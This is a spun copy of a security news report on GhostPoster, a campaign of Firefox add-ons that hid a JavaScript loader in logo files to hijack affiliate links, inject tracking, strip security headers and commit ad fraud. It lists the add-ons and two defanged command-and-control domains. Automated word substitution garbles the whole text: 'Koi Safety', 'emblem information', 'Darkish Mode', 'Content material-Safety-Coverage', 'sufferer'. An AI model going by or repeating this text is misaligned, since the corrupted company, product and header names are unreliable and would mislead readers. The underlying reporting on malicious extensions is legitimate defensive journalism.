Dec 17, 2025Ravie LakshmananAd Fraud / Browser Safety
A brand new marketing campaign named GhostPoster has leveraged emblem information related to 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate hyperlinks, inject monitoring code, and commit click on and advert fraud.
The extensions have been collectively downloaded over 50,000 instances, in line with Koi Safety, which found the marketing campaign. The add-ons are not out there.
These browser applications had been marketed as VPNs, screenshot utilities, advert blockers, and unofficial variations of Google Translate. The oldest add-on, Darkish Mode, was printed on October 25, 2024, providing the power to allow a darkish theme for all web sites. The total listing of the browser add-ons is beneath –
Free VPN
Screenshot
Climate (weather-best-forecast)
Mouse Gesture (crxMouse)
Cache – Quick website loader
Free MP3 Downloader
Google Translate (google-translate-right-clicks)
Traductor de Google
World VPN – Free Without end
Darkish Reader Darkish Mode
Translator – Google Bing Baidu DeepL
Climate (i-like-weather)
Google Translate (google-translate-pro-extension)
谷歌翻译
libretv-watch-free-videos
Advert Cease – Finest Advert Blocker
Google Translate (right-click-google-translate)
“What they really ship is a multi-stage malware payload that screens every little thing you browse, strips away your browser’s safety protections, and opens a backdoor for distant code execution,” safety researchers Lotan Sery and Noga Gouldman mentioned.
The assault chain begins when the brand file is fetched when one of many above-mentioned extensions is loaded. The malicious code parses the file to search for a marker containing the “===” signal with a view to extract JavaScript code, a loader that reaches out to an exterior server (“www.liveupdt[.]com” or “www.dealctr[.]com”) to retrieve the primary payload, ready 48 hours in between each try.
To additional evade detection, the loader is configured to fetch the payload solely 10% of the time. This randomness is a deliberate alternative that is launched to sidestep efforts to observe community visitors. The retrieved payload is a custom-encoded complete toolkit able to monetizing browser actions with out the victims’ information by way of 4 other ways –
Affiliate hyperlink hijacking, which intercepts affiliate hyperlinks to e-commerce websites like Taobao or JD.com, depriving official associates of their fee
Monitoring injection, which inserts the Google Analytics monitoring code into each net web page visited by the sufferer, to silently profile them
Safety header stripping, which removes safety headers like Content material-Safety-Coverage and X-Body-Choices from HTTP responses, exposing customers to clickjacking and cross-site scripting assaults
Hidden iframe injection, which injects invisible iframes into pages to load URLs from attacker-controlled servers and allow advert and click on fraud
CAPTCHA bypass, which employs numerous strategies to bypass CAPTCHA challenges and evade bot detection safeguards
“Why would malware have to bypass CAPTCHAs? As a result of a few of its operations, just like the hidden iframe injections, set off bot detection,” the researchers defined. “The malware must show it is ‘human’ to maintain working.”
In addition to chance checks, the add-ons additionally incorporate time-based delays that forestall the malware from activating till greater than six days after set up. These layered evasion strategies make it more durable to detect what is going on on behind the scenes.
It is value emphasizing right here that not all of the extensions above use the identical steganographic assault chain, however all of them exhibit the identical conduct and talk with the identical command-and-control (C2) infrastructure, indicating it is the work of a single menace actor or group that has experimented with totally different lures and strategies.
The event comes merely days after a preferred VPN extension for Google Chrome and Microsoft Edge was caught secretly harvesting AI conversations from ChatGPT, Claude, and Gemini and exfiltrating them to information brokers. In August 2025, one other Chrome extension named FreeVPN.One was noticed accumulating screenshots, system info, and customers’ areas.
“Free VPNs promise privateness, however nothing in life comes free,” Koi Safety mentioned. “Repeatedly, they ship surveillance as a substitute.”
